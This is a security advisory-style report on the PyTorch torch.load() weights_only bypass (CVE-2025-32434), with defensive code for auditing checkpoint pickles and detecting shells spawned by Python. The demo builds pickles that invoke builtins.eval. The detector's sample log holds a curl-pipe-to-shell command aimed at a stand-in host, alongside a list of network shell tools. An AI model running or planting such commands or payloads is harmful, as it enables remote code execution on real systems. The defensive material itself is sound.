Full Report
A major security flaw has been discovered in PyTorch, the widely used open-source machine learning framework. Identified as CVE-2025-32434, this newly reported PyTorch vulnerability allows attackers to execute arbitrary code on systems that load AI models, even when the protective weights_only=True setting is enabled. The flaw affects all PyTorch versions up to and including 2.5.1, according to a security advisory published earlier this week. It has been fixed in version 2.6.0, which is available through pip.

PyTorch Vulnerability Details

The root of the issue lies in PyTorch's torch.load() function, the core routine used to load serialized models. Because torch.load() deserializes model files with Python's pickle machinery, a crafted file can carry executable code, and for years developers have relied on the weights_only=True flag, which restricts unpickling to tensor data and a small set of allowed types, to protect against it. That protection has now been shown to be insufficient. Security researcher Ji'an Zhou demonstrated that the weights_only=True setting can be bypassed, so that loading a malicious model still executes attacker-supplied code. This finding directly contradicts PyTorch's own documentation, which previously recommended the setting as a reliable mitigation.

"This issue highlights the evolving nature of ML security," the PyTorch team stated. "We urge all users to update immediately and report suspicious model behavior."

Who Is at Risk?

Any application, research tool, or cloud service that calls torch.load() on an unpatched PyTorch version is exposed. This includes systems built for inference, federated learning, and model hub integrations. An attacker could upload a tampered model to a public repository or inject one into a software supply chain; when a user loads the compromised model, the exploit fires, potentially granting full control over the target system. Given the low complexity and high impact of the attack, security experts have classified the vulnerability as critical.
According to GitHub's CVE record, CVE-2025-32434 carries a CVSS 4.0 score of 9.3, placing it firmly in the "Critical" category. The vector string spells out why:

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

In plain terms, the flaw is reachable over the network (AV:N), has low attack complexity (AC:L), needs no special preconditions on the target (AT:N), no privileges (PR:N) and no user interaction (UI:N), and fully compromises the confidentiality, integrity and availability of the vulnerable system (VC:H/VI:H/VA:H). That combination makes it especially dangerous in real-world deployments.

Immediate Actions Recommended

The PyTorch team strongly urges all users to take the following steps:

- Upgrade to PyTorch 2.6.0 or later immediately with pip install --upgrade torch, and confirm that the installed torch version is 2.6.0 or later before loading any model again.
- Audit existing AI models, especially those sourced from third-party or public repositories, and do not load untrusted model files on an unpatched version.
- Monitor official security channels, including the PyTorch GitHub Security page and the related GitHub Advisory (GHSA-53q9-r3pm-6pq6), for updates.

Conclusion

The discovery of CVE-2025-32434 highlights gaps in the AI community's security practices: even widely trusted machine learning frameworks are not immune to serious flaws. The vulnerability affects all PyTorch versions up to and including 2.5.1 and allows remote code execution even with weights_only=True enabled. To protect their systems, users must upgrade to PyTorch 2.6.0 immediately, audit existing models (especially those from third-party sources), and closely monitor official security channels.
Analysis Summary
# Vulnerability: Critical PyTorch Flaw Allowing Remote Code Execution
## CVE Details
- CVE ID: CVE-2025-32434
- CVSS Score: 9.3 (Critical)
- CWE: Not stated in the report; the behaviour described (arbitrary code execution while `torch.load()` deserializes a model file) is insecure deserialization.
## Affected Systems
- Products: PyTorch
- Versions: All versions up to and including 2.5.1
- Configurations: Any code path that calls `torch.load()` on a model file, including calls that set `weights_only=True`.
## Vulnerability Description
This critical vulnerability allows remote code execution (RCE) in systems that use PyTorch to load AI models: a crafted model file executes attacker-supplied code when it is passed to `torch.load()`, and setting `weights_only=True`, previously documented as the mitigation, does not prevent it. Per the CVSS record the flaw is reachable over the network and requires neither user interaction nor privileges.
## Exploitation
- Status: Not reported as exploited in the wild in the source text; the risk is nonetheless high given the critical score and low complexity.
- Complexity: Low (CVSS vector AC:L)
- Attack Vector: Network (CVSS vector AV:N)
## Impact
- Confidentiality: High (VC:H)
- Integrity: High (VI:H)
- Availability: High (VA:H)
*(Note: CVSS 4.0 vector breakdown: AV:N (Network), AC:L (Low attack complexity), AT:N (no attack requirements, i.e. no preconditions on the target's state or configuration), PR:N (No Privileges Required), UI:N (No User Interaction). VC:H/VI:H/VA:H is High impact on the confidentiality, integrity and availability of the vulnerable system; SC:N/SI:N/SA:N scores no impact on subsequent systems.)*
## Remediation
### Patches
- Upgrade immediately to **PyTorch 2.6.0**.
- Command: `pip install --upgrade torch`, then confirm that the installed version is 2.6.0 or later.
### Workarounds
- Audit existing AI models, focusing on those sourced from third-party or public repositories, and do not load untrusted model files on an unpatched version; the `weights_only=True` flag is not a workaround for this flaw.
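The upgrade-then-audit procedure from the "Immediate Actions Recommended" list and this Remediation section, as an added example (not code from the advisory or from PyTorch). It gates on the installed `torch.__version__`, and before any `torch.load()` it statically lists every `module.name` a checkpoint's pickle stream would import by walking opcodes with the standard library's `pickletools`, without unpickling anything. Assumptions: the checkpoint uses the zip-based `torch.save()` layout with a `data.pkl` entry, the allowlist fits a plain `state_dict` (extend it for your own checkpoints), and the sample checkpoints built in `run_demo()` are constructed in memory. `torch` is imported only inside `guarded_load()`, so the audit itself runs without PyTorch installed.

```python
"""Pre-load audit for PyTorch checkpoints (added example; not advisory or PyTorch code).
Assumes the zip-based torch.save() layout with a data.pkl entry and an allowlist
that fits a plain state_dict; torch is imported only inside guarded_load()."""
import io
import pickle
import pickletools
import re
import zipfile
from collections import OrderedDict

FIXED_VERSION = (2, 6, 0)  # first release with the fix for CVE-2025-32434
# Assumed allowlist for a plain state_dict; extend it deliberately for your own checkpoints.
ALLOWED_GLOBALS = {
    "collections.OrderedDict", "torch._utils._rebuild_tensor_v2", "torch.FloatStorage",
    "torch.HalfStorage", "torch.BFloat16Storage", "torch.LongStorage", "torch.IntStorage",
    "torch.ByteStorage", "torch.BoolStorage",
}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE", "BINUNICODE",
              "SHORT_BINUNICODE", "BINUNICODE8"}
PUT_OPS, GET_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}, {"GET", "BINGET", "LONG_BINGET"}

def is_patched(version: str) -> bool:
    """True when a torch.__version__ string is 2.6.0 or newer ('+cu124'-style suffixes ignored)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m: raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(x) for x in m.groups()) >= FIXED_VERSION

def pickle_globals(data: bytes) -> set:
    """List every module.name a pickle would import, reading opcodes only (nothing is unpickled).
    Covers GLOBAL/INST (protocol <= 3) and STACK_GLOBAL (protocol >= 4, incl. BINGET memo reuse)."""
    found, memo, strings = set(), {}, []
    memo_count = 0  # MEMOIZE assigns memo indices sequentially
    last = None     # most recently pushed value, if it was a string
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            module, attr = arg.split(" ", 1)
            found.add(f"{module}.{attr}")
            last = None
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2: raise ValueError("STACK_GLOBAL without module/name strings")
            found.add(f"{strings[-2]}.{strings[-1]}")
            last = None
        elif op.name in STRING_OPS:
            last = arg
            strings.append(arg)
        elif op.name == "MEMOIZE":
            if isinstance(last, str):
                memo[memo_count] = last
            memo_count += 1
        elif op.name in PUT_OPS:
            if isinstance(last, str):
                memo[arg] = last
        elif op.name in GET_OPS:
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        else:
            last = None
    return found

def audit_checkpoint(blob: bytes, allowed=ALLOWED_GLOBALS) -> dict:
    """Scan every data.pkl in a torch.save()-format zip and flag globals outside the allowlist."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = [n for n in zf.namelist() if n.endswith("data.pkl")]
        if not names: raise ValueError("no data.pkl entry; not a zip-format torch checkpoint")
        found = set().union(*(pickle_globals(zf.read(n)) for n in names))
    unexpected = sorted(g for g in found if g not in allowed)
    return {"globals": sorted(found), "unexpected": unexpected, "safe_to_load": not unexpected}

def guarded_load(path: str):
    """Version gate plus audit before torch.load(); only reachable where torch is installed."""
    import torch  # lazy import: the audit helpers above do not need PyTorch
    if not is_patched(torch.__version__):
        raise RuntimeError(f"torch {torch.__version__} is affected by CVE-2025-32434; upgrade to 2.6.0+")
    with open(path, "rb") as f:
        report = audit_checkpoint(f.read())
    if not report["safe_to_load"]:
        raise RuntimeError(f"refusing {path}: unexpected globals {report['unexpected']}")
    return torch.load(path, map_location="cpu", weights_only=True)

class _EvalPayload:  # attacker-style object, constructed for the demo: its pickle calls builtins.eval
    def __reduce__(self):
        return (eval, ("1+1",))

def build_checkpoint(data_pkl: bytes) -> bytes:
    """Minimal in-memory zip in the torch.save() layout, constructed for the demo (no tensor data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("model/data.pkl", data_pkl)
        zf.writestr("model/version", "3\n")
    return buf.getvalue()

def run_demo() -> dict:
    """Audit a benign state_dict-like pickle and two malicious ones (protocols 2 and 4)."""
    benign = pickle.dumps(OrderedDict(weight=[1.0, 2.0]), protocol=4)
    # Hand-written protocol 2 stream: GLOBAL builtins eval, BINUNICODE '1+1', TUPLE1, REDUCE, STOP
    mal_proto2 = b"\x80\x02cbuiltins\neval\nX\x03\x00\x00\x001+1\x85R."
    mal_proto4 = pickle.dumps([_EvalPayload(), exec], protocol=4)  # STACK_GLOBAL; reuses 'builtins' via memo
    return {label: audit_checkpoint(build_checkpoint(pkl))
            for label, pkl in (("benign", benign), ("proto2", mal_proto2), ("proto4", mal_proto4))}

if __name__ == "__main__":
    for label, report in run_demo().items():
        print(label, "safe" if report["safe_to_load"] else "UNSAFE", report["globals"])
```

The opcode scan reports what a straightforward pickle stream imports; it is a defence-in-depth check that makes the third-party-model audit concrete, not a substitute for the upgrade, since the report does not say which construct the published bypass uses and an attacker can obfuscate a stream. Treat any global outside your allowlist as a reason to quarantine the file rather than loosen the list, and note that `is_patched()` accepts any version string starting with 2.6.0, so nightly builds should be checked by date.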
## Detection
- **Indicators of Compromise (IoC):** Not detailed in the provided text.
- **Detection Methods and Tools:** Monitor official security channels for new indicators. Watch for unexpected child processes (shells, download tools) spawned by Python processes during model loading, since the attacker's payload runs inside the process that called `torch.load()`.
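The process-lineage check described in the detection bullet, as an added example (not from the report or from PyTorch). It assumes process-creation events exported as JSON lines with `pid`, `ppid`, `image`, `cmdline` and `ts` fields, walks each shell or download tool up its parent chain, and flags it when a Python interpreter is among its ancestors. The events in `SAMPLE_EVENTS`, including the 198.51.100.7 address, are constructed for the demo.

```python
"""Detection sketch for shells or download tools spawned beneath a Python process
(added example, not from the report). Event schema and sample events are assumed/constructed."""
import json
import os

# Child images a model load has no business spawning (assumed list; tune per environment).
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat", "socat", "perl"}

# Constructed process-creation events: one inference service spawning sh -> curl,
# an interactive shell under sshd (no Python ancestor) and a benign nvidia-smi call.
SAMPLE_EVENTS = [
    '{"ts":"2025-04-18T10:02:11Z","pid":4100,"ppid":1,"image":"/usr/sbin/sshd","cmdline":"sshd: ops [priv]"}',
    '{"ts":"2025-04-18T10:02:12Z","pid":4102,"ppid":4100,"image":"/bin/bash","cmdline":"-bash"}',
    '{"ts":"2025-04-18T10:05:40Z","pid":5200,"ppid":1,"image":"/usr/bin/python3.11","cmdline":"python3 serve.py --model /models/hub/lm.pt"}',
    '{"ts":"2025-04-18T10:05:41Z","pid":5207,"ppid":5200,"image":"/usr/bin/dash","cmdline":"sh -c curl -s http://198.51.100.7/s.sh | sh"}',
    '{"ts":"2025-04-18T10:05:41Z","pid":5208,"ppid":5207,"image":"/usr/bin/curl","cmdline":"curl -s http://198.51.100.7/s.sh"}',
    '{"ts":"2025-04-18T10:06:00Z","pid":5300,"ppid":1,"image":"/usr/bin/python3.11","cmdline":"python3 train.py"}',
    '{"ts":"2025-04-18T10:06:01Z","pid":5304,"ppid":5300,"image":"/usr/bin/nvidia-smi","cmdline":"nvidia-smi -L"}',
]

def parse_events(lines) -> dict:
    """Index events by pid; a later event for the same pid overwrites an earlier one."""
    events = {}
    for line in lines:
        if line.strip():
            ev = json.loads(line)
            events[ev["pid"]] = ev
    return events

def python_ancestor(events: dict, ev: dict, max_depth: int = 4):
    """Nearest ancestor whose image is a Python interpreter, within max_depth hops, else None."""
    cur = ev
    for _ in range(max_depth):
        cur = events.get(cur.get("ppid"))
        if cur is None:
            return None
        if os.path.basename(cur["image"]).startswith("python"):
            return cur
    return None

def find_suspicious_spawns(lines) -> list:
    """Flag shells/download tools that have a Python interpreter among their ancestors."""
    events = parse_events(lines)
    hits = []
    for ev in events.values():
        if os.path.basename(ev["image"]) not in SUSPICIOUS_CHILDREN:
            continue
        parent = python_ancestor(events, ev)
        if parent is not None:
            hits.append({"ts": ev["ts"], "child_pid": ev["pid"], "child_cmdline": ev["cmdline"],
                         "python_pid": parent["pid"], "python_cmdline": parent["cmdline"]})
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_spawns(SAMPLE_EVENTS):
        print(f"{hit['ts']} pid {hit['python_pid']} ({hit['python_cmdline']}) spawned: {hit['child_cmdline']}")
```

Walking more than one hop matters because a payload typically goes `python -> sh -> curl`; matching only direct children would miss the download. Expect false positives from legitimate tooling that shells out from Python (build scripts, notebooks), so scope the rule to inference hosts or to the service account that loads models.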
## References
- Vendor Advisories: PyTorch GitHub Security page
- Relevant Links:
- GitHub Advisory: GHSA-53q9-r3pm-6pq6 (github.com/advisories/GHSA-53q9-r3pm-6pq6)